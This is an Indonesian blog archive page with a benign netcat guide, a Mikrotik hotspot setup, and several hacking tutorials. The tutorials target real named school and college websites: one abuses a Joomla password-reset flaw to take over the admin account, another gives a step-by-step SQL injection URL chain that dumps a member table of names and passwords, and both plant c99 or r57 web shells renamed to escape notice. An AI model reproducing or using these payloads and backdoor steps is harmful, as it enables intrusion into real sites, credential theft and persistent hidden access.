Computer archive

Tutorial, Internet, Hardware, Software, Os, Linux, Android, Security, Mikrotik

18 December, 2009

netcat – TCP/IP swiss army knife

netcat – TCP/IP swiss army knife

Friday, December 18, 2009 2 Comments
Penjelasan netcat yg di ambil dari man page :
netcat is a simple unix utility which reads and writes data across network connections, using TCP or UDP protocol. It is  designed  to  be  a reliable  “back-end” tool that can be used directly or easily driven by other programs and scripts.  At the same time,  it  is  a  feature-rich network  debugging and exploration tool, since it can create almost any kind of connection you would need and has several interesting  built-in capabilities.   Netcat,  or “nc” as the actual program is named, should have been supplied long ago as another one of those cryptic  but  standard Unix tools.
- Install netcat
# apt-get install netcat
Reading package lists… Done
Building dependency tree… Done
The following NEW packages will be installed
netcat
0 upgraded, 1 newly installed, 0 to remove and 0 not upgraded.
Need to get 66.8kB of archives.
After unpacking 233kB of additional disk space will be used.
WARNING: The following packages cannot be authenticated!
netcat
Install these packages without verification [y/N]? y
Get: 1 ftp://kambing.ui.edu stable/main netcat 1.10-32 [66.8kB]
Fetched 66.8kB in 4s (14.1kB/s)
Selecting previously deselected package netcat.
(Reading database … 40624 files and directories currently installed.)
Unpacking netcat (from …/netcat_1.10-32_i386.deb) …
Setting up netcat (1.10-32) …
- Untuk belajar lebih lanjut silahkan di baca man page nya
man nc
- Copying A File From One System To The Other
Misal kita ingin copy file smtprc-2.0.3.tgz dari Server1 ke Server2, langkah2nya adalah :
Server2
nc -lp 1234 > smtprc-2.0.3.tgz
Pada Server2 “1234″ adalah port yg tidak dipake, kita bisa merubah nilainya, Server2 akan menunggu sampai file smtprc-2.0.3.tgz siap pada port 1234
Server1
nc -w 1 server2.zulfanruri.com 1234 < smtprc-2.0.3.tgz
untuk memulai transfer file
- Kloning hardisk dan partisi
Kita bisa menggunakan netcat untuk kloning hardisk/partisi via jaringan. Contoh, kita ingin kloning /dev/sda dari server1 ke server2. Tentunya, partisi yg akan jadi kloningan :D harus unmounted pada target, sehingga jika kita ingin kloning partisi system, kita harus booting system target (Server2) dari Live-CD seperti knopping, dll.
Pada Server2, jalankan :
nc -l -p 1234 | dd of=/dev/sda
Setelah itu, pada server1 jalankan:
dd if=/dev/sda | nc server2.zulfanruri.com 1234
untuk memulai proses kloning. Ini akan memakan waktu sesuai dengan ukuran hardisk dan partisinya.
- Port scanning
nc -v -w 1 server2.zulfanruri.com -z 1-1000
(1-1000 artinya scan port dari port 1 sampai 1000)
- Chatting
Ternyata bisa dibuat chatingan lho…
Server2 :
nc -lp 1234
Server2 akan menunggu sampai Server1 terhubung ke port 1234
Server1
nc server2.zulfanruri.com 1234
Sekarang kita menulis chat dan tekan ENTER, dan chat tersebut akan tampil di system yang satunya. Untuk menghentikan, tekan CTRL+C.
By di 2 comments:

11 December, 2009

Pentest Joomla, Then Plant c99

Friday, December 11, 2009 0 Comments
  • tutorial ini buat temen gw yang request... thanks dah mo request ke gw. gw akan jelasin simplenya ajah yach...

    ok, first... gak semua joomla bisa dihack loch (inget)... joomla yang bisa di hack itu versi 1.5.5 kebawah... jadi untung-untungan ya...

    nich... dah ketemu salah satu samplenya..


    hole di joomla v1.5.x adalah lo bisa reset password admin sesuka lo..
    coba lo tambahin 'option=com_user&view=reset&layout=confirm' dibelakang index.php
    jadinya :
    http://www.sttif-bogor.com/main/index.php?option=com_user&view=reset&layout=confirm


    waktu masukin token, isi aja pake ' trus klik submit untuk melakukan reset password... trus ganti dech ma yang baru



    kalo udah,, ya masuk aja ke adminnya...

    login dech... default usernamenya admin trus passwordnya yang tadi kita ubah...


    masuk dech...

    nach... yang kudu kita siapin :
    1. backdoor (c99)... rename ajah jadi phpinfo.php biar ga ketauan...
    2. template yang sesuai ama versi joomlanya (1.5) jangan gde² kpasitasny -200kb recomended



    jalanin dech backdoornya... lo kudu tau adnya dimana...

    http://www.sttif-bogor.com/main/templates/gravity/phpinfo.php


    slese dech...

  • Start with BlindSQL Injection, Finishing with r57

    Posted: Sat, 11 Apr 2009 15:19:00 +0000
    nah... kayanya lo semua dah pada tau dech tentang BlindSQL injection... dari ttorial gw yang kemarin gw rasa dah cukup jelas fungsi dan kegunaan BlindSQL injection.. hanya saja tutorial gw yang kemarin BlindSQL injection untuk MySQL versi 4.

    yang gw beri sekarang itu BlindSQL injection untuk MySQL versi 5 jadi gak perlu repot-repot nebak data basenya okeh...

    nih... step by stepnya gak usah gw terangin juga dah ngerti kan...

    http://sma74jkt.sch.id/berita/media_detail.php?recordID=240'


    http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+order+by+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20--

    kolomnya cuma 19

    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--


    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,version(),13,14,15,16,17,18,19--


    nah untuk ngecek tablenya sekarang pake ini :
    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables--


    lo juga bisa tambahin syntax limit biar diliat berdasar no urut tabel.
    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19+from+information_schema.tables+limit+17,1--

    atau tambahin pake group_concat biar rapih dilihatnya...
    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(table_name),13,14,15,16,17,18,19+from+information_schema.tables--


    buat lihat kolomnya juga sama seperti melihat kolom
    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=anggota--

    tapi ada beberapa web yang gak mau langsung ngebaca table pake huruf biasa. jadi harus di convert jadi hexa dulu. jadinya :
    http://sma74jkt.sch.id/berita
    /media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(column_name),13,14,15,16,17,18,19+from+information_schema.columns+where+table_name=0x0x616e67676f7461--


    sekarang tinggal liat isinya:
    http://sma74jkt.sch.id/berita/media_detail.php?recordID=-240+union+select+1,2,3,4,5,6,7,8,9,10,11,group_concat(no_anggota,0x3a,nama,0x3a,nama_lengkap,0x3a,password,0x3a,status,0x3a,level),13,14,15,16,17,18,19+from+anggota--


    dah ketemu ya... nah kalo gini caranya mah tinggal login ajah... abisnya passwordnya gak pake MD5 sich... yaudah sekarang baru nebak loginnya ada dimana ya???
    ketemunya sich disini :
    http://sma74jkt.sch.id/login.php


    yaudah dech... sekarang tinggal upload backdoornya (r57). tapi lebih nyaman kalo kita taro didepan aja dech... sekalian biar gak terlalu mencurigakan bikin folder conf ajah.


    kalo udah upload r57 nya... kasih nama lain biar ga terlalu mencurigakan... misalkan phpinfo.php



    selesai dech....

  • Pengenalan C99 & r57 [backdoor]

    Posted: Sat, 11 Apr 2009 14:31:00 +0000
    mungkin ini udah gak asing buat web hacker yang udah advance yach... tapi gw cuma share aja buat sesama newbie...

    evilshell atao biasa disebut backdoor dalam web hacking emang sangat dibutuhin... ibarat lo dah kuasain penuh website tsb... mau lo deface, mo di shuttingdown, mo lo kasi tau admin tentang celahnya, ato mo lo kuasain admin and jadi admin di web ntu... itu nantinya...

    ada 2 evilshell yang biasa dipake buat web hacking... yaitu c99 dan r57

    nih screenshoot buat c99








    dan ini screenshoot bwt r57







    mah, dari keduanya emang rata-rata punya fitur yang hampir sama... cobain aja

Mikrotik Untuk Hotspot - Part 2

Posted: Sat, 11 Apr 2009 14:02:00 +0000
Play Now
posting gw yang kemaren kan ngebahas tentang mikrotik sebagai hotspot ya.. dan kemaren juga gw kasih tau proses installasinya kan, dan sekarang gw kasih tau konfigurasinya..

lo harus download dulu winbox dari mikrotiknya. dari sini

sekarang coba jalanin winboxnya

nah itu berarti mikrotik lo belom di set IPnya. klik aja trus klik connect




nah, dah masuk tampilan winbox...

trus ikutin aja cara-cara disini ya...

masukin password baru


masukin identitas baru



tambahin IP kesetiap ethernet




tambahin route baru, biar kalo misalnya si klien mau ke web apa aja harus lewat lo dulu


sekarang setting hotspotnya



keliatan ga sih???


settingan hotspot selesai...

sekarang setting buat kelompok, user per kelompok dan limit bandwidth per kelompok



gw bikin kelompok 'member' punya bandwidth 128kbps bwt upload dan 256kbps buat download


nah gw bikin username 'ivine' dengan password '123' yang ikutan kelompok 'member'

coba sekarang lo akses google.com dari laptop... lo cari koneksi hotspot lo dan ini yang akan terjadi


sukses dech...

sumber  : http://feeds2.feedburner.com/blogspot/EHgf
By di No comments: